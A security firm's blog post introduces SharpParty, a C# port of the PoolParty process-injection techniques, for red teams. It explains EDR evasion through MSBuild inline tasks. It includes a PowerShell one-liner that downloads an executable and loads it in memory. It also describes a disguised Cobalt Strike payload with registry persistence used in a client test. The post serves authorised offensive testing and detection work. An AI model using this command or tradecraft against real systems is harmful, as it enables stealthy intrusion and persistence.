November 11, 2025 4 Minute Read
This article originally appeared on the Stroz Freidberg, A LevelBlue Company, blog site.
As Anti-Virus and EDR solutions improve in detection and response capabilities, the job of a red teamer can become quite arduous. Malware payloads and techniques that once dominated networks have failed the test of time as EDR becomes aware of them. If your initial access payloads are detected immediately, your six-week long red team could be dead on arrival. Additionally, real-world threat actors have an abundance of time and resources; just imagine all the payloads, techniques, and 0-days that a sophisticated threat actor group may have developed over the years. It is essential for red teams to continuously develop t…
November 11, 2025 4 Minute Read
This article originally appeared on the Stroz Freidberg, A LevelBlue Company, blog site.
As Anti-Virus and EDR solutions improve in detection and response capabilities, the job of a red teamer can become quite arduous. Malware payloads and techniques that once dominated networks have failed the test of time as EDR becomes aware of them. If your initial access payloads are detected immediately, your six-week long red team could be dead on arrival. Additionally, real-world threat actors have an abundance of time and resources; just imagine all the payloads, techniques, and 0-days that a sophisticated threat actor group may have developed over the years. It is essential for red teams to continuously develop their tactics, techniques, and procedures (TTPs) for the purpose of emulating real-life threat actors that are ever evolving.
In this blog post, Stroz Friedberg, a LevelBlue company, introduces an addition to the red teamers’ toolkit called “SharpParty” – a C# implementation of the process injection techniques dubbed “PoolParty”.
We want to be very clear here: Stroz Friedberg did not create PoolParty nor did Stroz Friedberg extend the research into Windows Thread Pools. Rather, Stroz Friedberg simply translated the original source code of SafeBreach Labs from C++ to C#. The goal here is to give red teamers more options when picking their payloads. You can download SharpParty from our GitHub repository.
Process Injection
Before we dive into PoolParty, we must understand what process injection is first. Process injection is a relatively simple concept: inject code into another process. The purpose of injecting code into another process is to hide and obscure malicious activities. The actual implementation of process injection, however, is not as simple.
If you would like to learn more about process injection, please refer to the following URLs:
- https://attack.mitre.org/techniques/T1055/
- https://github.com/plackyhacker/Shellcode-Injection-Techniques
PoolParty
SafeBreach Labs masterfully exemplified the necessity of continuous TTP development through the release of “PoolParty” – a suite of process injection techniques that target Windows Thread Pools. With this research, SafeBreach Labs was able to bypass five of the leading EDR vendors. They also released a Proof-of-Concept GitHub repository, with source code written in C++.
In short, PoolParty injects code into processes by crafting and inserting legitimate work items into a process’s thread pool. A work item is a structure that contains a task specification, including specific conditions and code to execute when these conditions are met. Injected work items effectively act as the execution primitive, because the work item will execute our code when its conditions are met. For example, a work item can perform an action when a file is modified. The file modification in this example is the execution primitive and we do not have to manually start the execution via something like “CreateRemoteThread”, which is a well-known indicator of process injection.
Motivation
The primary motivation for a C# implementation is to allow the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files. A Task XML file can include embedded C# code that, when passed to “msbuild.exe”, will be compiled and executed. While Task XMLs do support C++ (the language the original PoC was written in), they are only supported when the “CppCodeProvider.dll” assembly is present on the target machine. This DLL is included within some Visual Studio installations and is not guaranteed to be present on Windows machines by default. To ensure our payloads would detonate on practically any Windows host, we would need to implement the PoolParty technique in C#.
Additionally, a C# implementation of PoolParty can be reflectively loaded into memory via PowerShell:
$data = (new-object net.webclient).downloaddata(‘http://127.0.0.1/sharpparty.exe’);``$assem = [System.Reflection.Assembly]::Load($data);``[SharpParty.Program]::Main(“1 666”.Split());
Lastly, as offensive C# tooling continues to grow in popularity, a C# PoolParty implementation can be integrated into other offensive tooling as part of varying attack chains.
For these reasons, Stroz Friedberg began implementation of the “PoolParty” technique in C# – SharpParty.
Efficacy Against EDR
During our testing, SharpParty was consistently able to bypass Microsoft Defender for Endpoint (MDE) initially. We submitted a report to Microsoft that demonstrated the bypass in March of 2025, which they validated and subsequently implemented detections for. Since then, we have observed an increase in the number of detections on SharpParty. Other EDR systems have detected and sometimes prevented the execution of SharpParty, largely based on the malicious use of “msbuild.exe” as well as an unspecified process injection technique.
While SharpParty inline tasks have seen increased detections from EDR recently, there are a few things worth noting:
- SafeBreach Labs publicly released their research on process injection via Windows Thread Pools, enabling EDR vendors to implement detections and monitoring for this technique.
- The use of inline tasks and “msbuild.exe” is a relatively well-known technique.
- There is room for further development that could improve the payload’s efficacy against EDR.
Ultimately our goal is to give red teams one more item in their toolkit, one more means to meet an end, another test case that evaluates threat detection capabilities.
Success Story
During our research, we had the opportunity to further test our code on a client engagement. The following is a breakdown of our payload:
- A Task XML file with C# inline task that contains encrypted SharpParty code and helper functions to fetch the decryption key, decrypt the code, then compile and execute the decrypted code.
- The beacon shellcode is nested within an additional layer of encryption.
- HTTP Keying is used to retrieve and validate the decryption key, ensuring connectivity to the C2 server.
The execution flow of the payload is depicted in the diagram below:
Figure 1. Payload execution flow diagram.
How the dropper executes “msbuild.exe” on the task XML is dependent on various conditions and is outside the scope of this blog post.
With everything tested and ready to go, we joined a call with the client to screenshare the malware detonation. We disguised the payload in such a way that, from the victim’s perspective, it looks like they downloaded a ZIP file and opened a PDF. Under the hood, we successfully executed SharpParty and obtained a Cobalt Strike beacon. After establishing the C2 channel, the client received no alarms on their side at that moment. After about 10 minutes, we suggested a test-case involving persistence via registry run keys to check if this activity is detected. The client agreed, and we performed the test case live on the call, setting an autorun key to execute the same SharpParty payload. Then, we logged out of the workstation, logged back in, and received the second beacon.
The client was understandably concerned, seeing as we had established two C2 beacons and they had not received any detections. 30 minutes after detonation, the EDR picked up the malicious use of “msbuild.exe” and an unspecified malicious payload in our target process, for which the client was alerted.
While ultimately this code was still caught, there are two key takeaways:
- The execution of “msbuild.exe” is what was picked up by EDR.
- There are 30 minutes between detonation and detection. While relatively small, this gap may be large enough for a threat actor to pivot within the network and maintain their access.
Conclusion
In summary, we have developed a C# implementation of PoolParty based on the incredible work from SafeBreach Labs, provided motivation for its existence, and shared a success story. As always, there is room for improvement. We have room to grow in terms of adding more variants, perhaps even discovering new ones, and improving the efficacy against EDR products. Our goal in publishing this blog post and open sourcing SharpParty is to share knowledge with the security community and provide avenues for future research and development.
About the Author
Will Rabb is Technical Manager, Security Testing, Stroz Friedberg, a LevelBlue Company.
ABOUT TRUSTWAVE
Trustwave, A LevelBlue Company, is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.